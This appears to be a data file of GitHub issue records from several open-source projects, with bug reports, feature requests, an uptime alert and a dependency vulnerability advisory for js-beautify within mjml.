6,102,990,535
IssuesEvent
2017-06-20 17:43:31
brave/browser-laptop
https://api.github.com/repos/brave/browser-laptop
closed
noscript allowing selective sites once doesn't invalidate the exceptions
bug feature/shields info-needed security
tested on master 1. disable scripts globally and go to https://jsfiddle.net/ 2. click noscript icon. unselect all except jsfiddle.net and hit 'allow once' 3. close tab then open jsfiddle.net again 4. click noscript icon. it appears jsfiddle.net is still allowed.
True
noscript allowing selective sites once doesn't invalidate the exceptions - tested on master 1. disable scripts globally and go to https://jsfiddle.net/ 2. click noscript icon. unselect all except jsfiddle.net and hit 'allow once' 3. close tab then open jsfiddle.net again 4. click noscript icon. it appears jsfiddle.net is still allowed.
non_main
noscript allowing selective sites once doesn t invalidate the exceptions tested on master disable scripts globally and go to click noscript icon unselect all except jsfiddle net and hit allow once close tab then open jsfiddle net again click noscript icon it appears jsfiddle net is still allowed
0
153,971
13,532,442,033
IssuesEvent
2020-09-16 00:08:30
E3SM-Project/zstash
https://api.github.com/repos/E3SM-Project/zstash
closed
Documentation versions
documentation
Find a way to have multiple versions of documentation online. Suppose version `n` is the latest release but `master` has more commits and the docs have been updated accordingly. Currently, users would see the latest docs online even though the docs describe features not included in the version they are using. Possible solution would be to just have the `index.html` point to a bulleted list of docs (v1, v2, master/merged-but-not-released-yet). We can also look into updating the documentation in `master` instead of on `gh-pages`. This would be nice because developers could update code and documentation in the same PR. However, it wouldn't solve the primary problem of needing to serve multiple versions of the docs online (unless we had users refer to the docs included in the release they download rather than looking online).
1.0
Documentation versions - Find a way to have multiple versions of documentation online. Suppose version `n` is the latest release but `master` has more commits and the docs have been updated accordingly. Currently, users would see the latest docs online even though the docs describe features not included in the version they are using. Possible solution would be to just have the `index.html` point to a bulleted list of docs (v1, v2, master/merged-but-not-released-yet). We can also look into updating the documentation in `master` instead of on `gh-pages`. This would be nice because developers could update code and documentation in the same PR. However, it wouldn't solve the primary problem of needing to serve multiple versions of the docs online (unless we had users refer to the docs included in the release they download rather than looking online).
non_main
documentation versions find a way to have multiple versions of documentation online suppose version n is the latest release but master has more commits and the docs have been updated accordingly currently users would see the latest docs online even though the docs describe features not included in the version they are using possible solution would be to just have the index html point to a bulleted list of docs master merged but not released yet we can also look into updating the documentation in master instead of on gh pages this would be nice because developers could update code and documentation in the same pr however it wouldn t solve the primary problem of needing to serve multiple versions of the docs online unless we had users refer to the docs included in the release they download rather than looking online
0
252,945
21,640,799,313
IssuesEvent
2022-05-05 18:33:57
damccorm/test-migration-target
https://api.github.com/repos/damccorm/test-migration-target
opened
Document Jenkins ghprb commands
P3 testing task
Summarize current ghprb (github pull request builder plugin) commands for people to easily find and use instead of to check each groovy file. commands includes: "retest this please", command to run specific Jenkins build (defined under .test\-infra/jenkins/job_beam_*.groovy). Imported from Jira [BEAM-3068](https://issues.apache.org/jira/browse/BEAM-3068). Original Jira may contain additional context. Reported by: markflyhigh.
1.0
Document Jenkins ghprb commands - Summarize current ghprb (github pull request builder plugin) commands for people to easily find and use instead of to check each groovy file. commands includes: "retest this please", command to run specific Jenkins build (defined under .test\-infra/jenkins/job_beam_*.groovy). Imported from Jira [BEAM-3068](https://issues.apache.org/jira/browse/BEAM-3068). Original Jira may contain additional context. Reported by: markflyhigh.
non_main
document jenkins ghprb commands summarize current ghprb github pull request builder plugin commands for people to easily find and use instead of to check each groovy file commands includes retest this please command to run specific jenkins build defined under test infra jenkins job beam groovy imported from jira original jira may contain additional context reported by markflyhigh
0
40,311
8,773,209,958
IssuesEvent
2018-12-18 16:18:24
pnp/pnpjs
https://api.github.com/repos/pnp/pnpjs
closed
ListAddResult with list name containing apostrophe
area: code status: duplicate type: enhancement
### Category - [ ] Enhancement - [X] Bug - [ ] Question - [ ] Documentation gap/issue ### Version Please specify what version of the library you are using: [1.7.0] Please specify what version(s) of SharePoint you are targeting: [ONLINE] ### Expected / Desired Behavior / Question Using _ListAddResult_ after creating list where list name contains apostrophe would contain correctly encoded list name, so that following code would work. ### Observed Behavior Currently the _url of ListAddResult contains single apostrophe causing highlighted `.expand...` code to fail. ![image](https://user-images.githubusercontent.com/6917905/50152159-94d34080-02cb-11e9-8ea1-9fb56ee38306.png) ### Steps to Reproduce 1. Create list where list name contains apostrophe using the following code where listName is e.g., "Test'4". 2. Using ListAddResult of sp.web.lists.add contains _url where apostrophes are not correctly duplicated, making the `lar.list.expand `code to fail. ``` sp.web.lists.add("Test'4", "", 100, false) .then((lar: ListAddResult) => { lar.list.expand("RootFolder").select("RootFolder/ServerRelativeUrl").get() // throws error .then((result) => { listUrl = result.RootFolder.ServerRelativeUrl; ```
1.0
ListAddResult with list name containing apostrophe - ### Category - [ ] Enhancement - [X] Bug - [ ] Question - [ ] Documentation gap/issue ### Version Please specify what version of the library you are using: [1.7.0] Please specify what version(s) of SharePoint you are targeting: [ONLINE] ### Expected / Desired Behavior / Question Using _ListAddResult_ after creating list where list name contains apostrophe would contain correctly encoded list name, so that following code would work. ### Observed Behavior Currently the _url of ListAddResult contains single apostrophe causing highlighted `.expand...` code to fail. ![image](https://user-images.githubusercontent.com/6917905/50152159-94d34080-02cb-11e9-8ea1-9fb56ee38306.png) ### Steps to Reproduce 1. Create list where list name contains apostrophe using the following code where listName is e.g., "Test'4". 2. Using ListAddResult of sp.web.lists.add contains _url where apostrophes are not correctly duplicated, making the `lar.list.expand `code to fail. ``` sp.web.lists.add("Test'4", "", 100, false) .then((lar: ListAddResult) => { lar.list.expand("RootFolder").select("RootFolder/ServerRelativeUrl").get() // throws error .then((result) => { listUrl = result.RootFolder.ServerRelativeUrl; ```
non_main
listaddresult with list name containing apostrophe category enhancement bug question documentation gap issue version please specify what version of the library you are using please specify what version s of sharepoint you are targeting expected desired behavior question using listaddresult after creating list where list name contains apostrophe would contain correctly encoded list name so that following code would work observed behavior currently the url of listaddresult contains single apostrophe causing highlighted expand code to fail steps to reproduce create list where list name contains apostrophe using the following code where listname is e g test using listaddresult of sp web lists add contains url where apostrophes are not correctly duplicated making the lar list expand code to fail sp web lists add test false then lar listaddresult lar list expand rootfolder select rootfolder serverrelativeurl get throws error then result listurl result rootfolder serverrelativeurl
0
211,868
16,373,762,097
IssuesEvent
2021-05-15 17:27:10
F-Fichter/uptime-smtp
https://api.github.com/repos/F-Fichter/uptime-smtp
opened
🛑 Test-fichtereu is down
status test-fichtereu
In [`b18c90a`](https://github.com/F-Fichter/uptime-smtp/commit/b18c90a1d06387b3abebec494a480754bf229881 ), Test-fichtereu (http://fichter.eu) was **down**: - HTTP code: 0 - Response time: 0 ms
1.0
🛑 Test-fichtereu is down - In [`b18c90a`](https://github.com/F-Fichter/uptime-smtp/commit/b18c90a1d06387b3abebec494a480754bf229881 ), Test-fichtereu (http://fichter.eu) was **down**: - HTTP code: 0 - Response time: 0 ms
non_main
🛑 test fichtereu is down in test fichtereu was down http code response time ms
0
90,185
3,812,642,609
IssuesEvent
2016-03-27 18:46:10
numpy/numpy
https://api.github.com/repos/numpy/numpy
closed
numpy.concat does not appear to work across broadcast axes (Trac #1518)
11 - Bug component: Other priority: normal
_Original ticket http://projects.scipy.org/numpy/ticket/1518 on 2010-06-22 by trac user eob, assigned to unknown._ When I'm trying to concatenate two tensors together, the concatenate operation does not allow me to use broadcast dimensions (using newaxis) in one of them.
1.0
numpy.concat does not appear to work across broadcast axes (Trac #1518) - _Original ticket http://projects.scipy.org/numpy/ticket/1518 on 2010-06-22 by trac user eob, assigned to unknown._ When I'm trying to concatenate two tensors together, the concatenate operation does not allow me to use broadcast dimensions (using newaxis) in one of them.
non_main
numpy concat does not appear to work across broadcast axes trac original ticket on by trac user eob assigned to unknown when i m trying to concatenate two tensors together the concatenate operation does not allow me to use broadcast dimensions using newaxis in one of them
0
86,633
10,512,543,923
IssuesEvent
2019-09-27 18:11:05
gocodebox/lifterlms-rest
https://api.github.com/repos/gocodebox/lifterlms-rest
closed
Delete student enrollment requires change to enrollment status
language: php status: assigned type: bug type: documentation
If a `DELETE /students/{id}/enrollments/{post_id}` operation is performed on a membership enrollment with a status of `enrolled`, the student report page still displays a membership but with a blank status and enrolled column. If a `PATCH /students/{id}/enrollments/{post_id}` operation changes the `status` to `cancelled` before the `DELETE` operation, the enrollment is correctly removed from the student report page. @eri-trabiccolo suggests two possibilities: 1. we check the enrollment status before deleting and if active we return an error with instructions on what to do before 1. always unenroll before deleting Another option is: 3. Add a note to the `DELETE /students/{id}/enrollments/{post_id}` spec about the need to change the enrollment status first.
1.0
Delete student enrollment requires change to enrollment status - If a `DELETE /students/{id}/enrollments/{post_id}` operation is performed on a membership enrollment with a status of `enrolled`, the student report page still displays a membership but with a blank status and enrolled column. If a `PATCH /students/{id}/enrollments/{post_id}` operation changes the `status` to `cancelled` before the `DELETE` operation, the enrollment is correctly removed from the student report page. @eri-trabiccolo suggests two possibilities: 1. we check the enrollment status before deleting and if active we return an error with instructions on what to do before 1. always unenroll before deleting Another option is: 3. Add a note to the `DELETE /students/{id}/enrollments/{post_id}` spec about the need to change the enrollment status first.
non_main
delete student enrollment requires change to enrollment status if a delete students id enrollments post id operation is performed on a membership enrollment with a status of enrolled the student report page still displays a membership but with a blank status and enrolled column if a patch students id enrollments post id operation changes the status to cancelled before the delete operation the enrollment is correctly removed from the student report page eri trabiccolo suggests two possibilities we check the enrollment status before deleting and if active we return an error with instructions on what to do before always unenroll before deleting another option is add a note to the delete students id enrollments post id spec about the need to change the enrollment status first
0
220,436
24,565,030,497
IssuesEvent
2022-10-13 01:36:12
appvantageasia/starter-kit
https://api.github.com/repos/appvantageasia/starter-kit
opened
mjml-4.13.0.tgz: 1 vulnerabilities (highest severity is: 5.5)
security vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>mjml-4.13.0.tgz</b></p></summary> <p></p> <p> </details> ## Vulnerabilities | CVE | Severity | <img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS | Dependency | Type | Fixed in | Remediation Available | | ------------- | ------------- | ----- | ----- | ----- | --- | --- | | [CVE-2022-37609](https://vuln.whitesourcesoftware.com/vulnerability/CVE-2022-37609) | <img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Medium | 5.5 | js-beautify-1.14.3.tgz | Transitive | N/A | &#10060; | ## Details <details> <summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> CVE-2022-37609</summary> ### Vulnerable Library - <b>js-beautify-1.14.3.tgz</b></p> <p>beautifier.io for node</p> <p>Library home page: <a href="https://registry.npmjs.org/js-beautify/-/js-beautify-1.14.3.tgz">https://registry.npmjs.org/js-beautify/-/js-beautify-1.14.3.tgz</a></p> <p> Dependency Hierarchy: - mjml-4.13.0.tgz (Root Library) - mjml-migrate-4.13.0.tgz - :x: **js-beautify-1.14.3.tgz** (Vulnerable Library) <p>Found in base branch: <b>next</b></p> </p> <p></p> ### Vulnerability Details <p> Prototype pollution vulnerability in beautify-web js-beautify 1.13.7 via the name variable in options.js. 
<p>Publish Date: 2022-10-11 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2022-37609>CVE-2022-37609</a></p> </p> <p></p> ### CVSS 3 Score Details (<b>5.5</b>) <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Local - Attack Complexity: Low - Privileges Required: None - User Interaction: Required - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> <p></p> Step up your Open Source Security Game with Mend [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) </details>
True
mjml-4.13.0.tgz: 1 vulnerabilities (highest severity is: 5.5) - <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>mjml-4.13.0.tgz</b></p></summary> <p></p> <p> </details> ## Vulnerabilities | CVE | Severity | <img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS | Dependency | Type | Fixed in | Remediation Available | | ------------- | ------------- | ----- | ----- | ----- | --- | --- | | [CVE-2022-37609](https://vuln.whitesourcesoftware.com/vulnerability/CVE-2022-37609) | <img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Medium | 5.5 | js-beautify-1.14.3.tgz | Transitive | N/A | &#10060; | ## Details <details> <summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> CVE-2022-37609</summary> ### Vulnerable Library - <b>js-beautify-1.14.3.tgz</b></p> <p>beautifier.io for node</p> <p>Library home page: <a href="https://registry.npmjs.org/js-beautify/-/js-beautify-1.14.3.tgz">https://registry.npmjs.org/js-beautify/-/js-beautify-1.14.3.tgz</a></p> <p> Dependency Hierarchy: - mjml-4.13.0.tgz (Root Library) - mjml-migrate-4.13.0.tgz - :x: **js-beautify-1.14.3.tgz** (Vulnerable Library) <p>Found in base branch: <b>next</b></p> </p> <p></p> ### Vulnerability Details <p> Prototype pollution vulnerability in beautify-web js-beautify 1.13.7 via the name variable in options.js. 
<p>Publish Date: 2022-10-11 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2022-37609>CVE-2022-37609</a></p> </p> <p></p> ### CVSS 3 Score Details (<b>5.5</b>) <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Local - Attack Complexity: Low - Privileges Required: None - User Interaction: Required - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> <p></p> Step up your Open Source Security Game with Mend [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) </details>
non_main
mjml tgz vulnerabilities highest severity is vulnerable library mjml tgz vulnerabilities cve severity cvss dependency type fixed in remediation available medium js beautify tgz transitive n a details cve vulnerable library js beautify tgz beautifier io for node library home page a href dependency hierarchy mjml tgz root library mjml migrate tgz x js beautify tgz vulnerable library found in base branch next vulnerability details prototype pollution vulnerability in beautify web js beautify via the name variable in options js publish date url a href cvss score details base score metrics exploitability metrics attack vector local attack complexity low privileges required none user interaction required scope unchanged impact metrics confidentiality impact none integrity impact none availability impact high for more information on scores click a href step up your open source security game with mend
0
3,855
17,017,525,001
IssuesEvent
2021-07-02 14:03:27
obs-websocket-community-projects/obs-websocket-java
https://api.github.com/repos/obs-websocket-community-projects/obs-websocket-java
opened
Examples Dir
5.X.X Support maintainability
Rather than providing examples in the README, we could provide a small examples module/directory showing how to use the client for some common use cases: - Connect (waiting for ready), then making a call - Making requests directly (rather than via convenience methods) - Disconnect and reconnect - etc as requested (adding new examples could be tied directly to discussions or issues)
True
Examples Dir - Rather than providing examples in the README, we could provide a small examples module/directory showing how to use the client for some common use cases: - Connect (waiting for ready), then making a call - Making requests directly (rather than via convenience methods) - Disconnect and reconnect - etc as requested (adding new examples could be tied directly to discussions or issues)
main
examples dir rather than providing examples in the readme we could provide a small examples module directory showing how to use the client for some common use cases connect waiting for ready then making a call making requests directly rather than via convenience methods disconnect and reconnect etc as requested adding new examples could be tied directly to discussions or issues
1
893
18,460,057,547
IssuesEvent
2021-10-15 23:00:09
microsoft/fluentui
https://api.github.com/repos/microsoft/fluentui
closed
PeoplePicker - NormalPeoplePicker - Android talkback incorrect focus order when trying to select a suggestion
Component: PeoplePicker Needs: Investigation Fluent UI react (v8) Resolution: Soft Close
### Environment Information - **Package version(s)**: 7.158.3 - **Browser and OS versions**: Android OS 10, Pixel 3a/Chrome Browser 86.0.4240.198 ### Describe the issue: ### Please provide a reproduction of the issue in a codepen: 1. https://codepen.io/kestill/pen/dyOWEKg 2. Press textbox to open suggestions menu 3. Swipe right and observe talkback focus #### Actual behavior: After suggestions are shown, swipe right then talkback focus will land on first element of Chrome web page. #### Expected behavior: After suggestions available when user swipe right focus should be on 'first suggestion' and Talkback should announce 'first suggestion'. ### Documentation describing expected behavior MAS Reference: [MAS 2.4.3 - Focus Order](https://microsoft.sharepoint.com/:w:/r/teams/msenable/_layouts/15/WopiFrame2.aspx?sourcedoc=%7b0de7fbe1-ad7e-48e5-bcbb-8d986691e2b9%7d)
1.0
PeoplePicker - NormalPeoplePicker - Android talkback incorrect focus order when trying to select a suggestion - ### Environment Information - **Package version(s)**: 7.158.3 - **Browser and OS versions**: Android OS 10, Pixel 3a/Chrome Browser 86.0.4240.198 ### Describe the issue: ### Please provide a reproduction of the issue in a codepen: 1. https://codepen.io/kestill/pen/dyOWEKg 2. Press textbox to open suggestions menu 3. Swipe right and observe talkback focus #### Actual behavior: After suggestions are shown, swipe right then talkback focus will land on first element of Chrome web page. #### Expected behavior: After suggestions available when user swipe right focus should be on 'first suggestion' and Talkback should announce 'first suggestion'. ### Documentation describing expected behavior MAS Reference: [MAS 2.4.3 - Focus Order](https://microsoft.sharepoint.com/:w:/r/teams/msenable/_layouts/15/WopiFrame2.aspx?sourcedoc=%7b0de7fbe1-ad7e-48e5-bcbb-8d986691e2b9%7d)
non_main
peoplepicker normalpeoplepicker android talkback incorrect focus order when trying to select a suggestion environment information package version s browser and os versions android os pixel chrome browser describe the issue please provide a reproduction of the issue in a codepen press textbox to open suggestions menu swipe right and observe talkback focus actual behavior after suggestions are shown swipe right then talkback focus will land on first element of chrome web page expected behavior after suggestions available when user swipe right focus should be on first suggestion and talkback should announce first suggestion documentation describing expected behavior mas reference
0